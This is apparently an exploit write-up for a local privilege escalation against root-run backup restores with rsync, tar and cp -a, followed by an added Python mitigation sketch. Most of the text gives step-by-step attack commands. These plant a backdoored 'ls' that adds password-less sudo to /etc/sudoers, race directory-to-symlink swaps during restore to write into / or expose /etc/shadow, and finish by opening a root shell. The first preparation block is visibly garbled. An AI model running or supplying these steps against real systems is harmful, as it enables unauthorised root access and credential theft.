Preparation:
============

Unpack and compile the helper as user test:

base64 -d < root/bin/ls
#!/bin/bash
test -r /etc/shadow && echo "test ALL=NOPASSWD: ALL" >> /etc/sudoers
exec /bin/ls2 "\$@"
EOF
chmod 0755 root/bin/ls
cp -a /bin/ls root/bin/ls2
mkdir etc
dd if=/dev/zero of=etc/shadow bs=1M count=1

Rsync:
======

Start the read-example trap to include shadow in the home backup:

./DirModifyInotify --Watch "etc" --WatchCount 1 --MovePath etc --LinkTarget /etc

Run the nightly backup as root; this will run 100% as expected, producing a standard user home dir backup:

root# mkdir xxx
root# rsync -av /home/test xxx/

Run the trap commands as user test in /home/test, then trigger the restore:

test# rm -rf root/bin
test# echo "Waiting for event .." >&2
test# ./DirModifyInotify --Watch root --WatchCount 0 --MovePath root --LinkTarget /

Restore the backup as root while the trap is running:

root# rsync -av xxx/test /home

Use the data in /etc/shadow or wait for root to run ls once.

Tar:
====

Starting the read-example trap is futile with tar version >= 1.25, since the issue is fixed there. With older tar, the following might work:

./DirModifyInotify --Watch "etc" --WatchCount 0 --MovePath etc --LinkTarget /etc

Run the nightly backup as root; this will run 100% as expected, producing a standard user home dir backup:

root# tar -C /home/test -cf /root/test.tar .

Run the trap commands as user test in /home/test, then trigger the restore:

test# rm -rf root/bin
test# echo "Waiting for event .." >&2
test# ./DirModifyInotify --Watch root --WatchCount 0 --MovePath root --LinkTarget /

Restore the backup as root while the trap is running:

root# tar -C /home/test -xf /root/test.tar

Use the data in /etc/shadow (if available) or wait for root to run ls once.

cp -a:
======

If the backup was extracted to a secure location, e.g. /root/test, "cp -a" to the user home is also problematic.
Since cp will not modify the existing ls, the modified ls can be put into another directory included in PATH that is searched before /bin, e.g. /sbin.

Preparation:

mkdir -p root/sbin
cat <<EOF > root/sbin/ls
#!/bin/bash
test -r /etc/shadow && echo "test ALL=NOPASSWD: ALL" >> /etc/sudoers
exec /bin/ls "\$@"
EOF
chmod 0755 root/sbin/ls

As root:

cp -a /home/test /root/test

Start trap:

rm -rf root/sbin
./DirModifyInotify --Watch root/ --WatchCount 0 --MovePath root --LinkTarget /

cd /root
cp -aT test /home/test

Use the backdoor:
=================

Wait for root to run "ls", giving full root permissions to user "test", since the backdoored ls will add password-less sudo for user test:

root# ls

Use root access as user test; perform "sudo -s /bin/bash" to get root:

test# sudo -s /bin/bash
root# echo $EUID
0
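
Mitigation sketch (an added example, not part of the original write-up or of rsync, tar or cp): a restore writer that resists the directory-to-symlink swap shown above by opening every path component relative to a held directory descriptor with O_NOFOLLOW, so a "root" directory replaced by a link to / makes the restore fail instead of writing outside the home. The function name restore_file is hypothetical, and the destination root itself (e.g. /home/test, whose parent is root-owned) is assumed to be trusted.

```python
import os

DIR_FLAGS = os.O_RDONLY | os.O_DIRECTORY | os.O_NOFOLLOW
FILE_FLAGS = os.O_WRONLY | os.O_CREAT | os.O_TRUNC | os.O_NOFOLLOW


def restore_file(dest_root, relpath, data, mode=0o644):
    """Write data to dest_root/relpath without following any symlink
    below dest_root. Raises OSError if a component is a symlink."""
    parts = [p for p in relpath.split("/") if p]
    if not parts or any(p in (".", "..") for p in parts):
        raise ValueError("unsafe relative path: %r" % relpath)
    # Assumption: dest_root is chosen by the admin and cannot be replaced
    # by the user; everything below it is user-controlled and may be
    # swapped at any moment while the restore runs.
    dirfd = os.open(dest_root, os.O_RDONLY | os.O_DIRECTORY)
    try:
        for name in parts[:-1]:
            try:
                os.mkdir(name, 0o755, dir_fd=dirfd)
            except FileExistsError:
                pass  # directory or planted symlink; the open below decides
            # Resolved relative to the descriptor we hold, never by
            # re-walking the full path. O_NOFOLLOW turns a symlink in this
            # position into an error (ELOOP or ENOTDIR).
            nextfd = os.open(name, DIR_FLAGS, dir_fd=dirfd)
            os.close(dirfd)
            dirfd = nextfd
        # The final component must not be a symlink either.
        fd = os.open(parts[-1], FILE_FLAGS, mode, dir_fd=dirfd)
        with os.fdopen(fd, "wb") as out:
            out.write(data)
    finally:
        os.close(dirfd)
```
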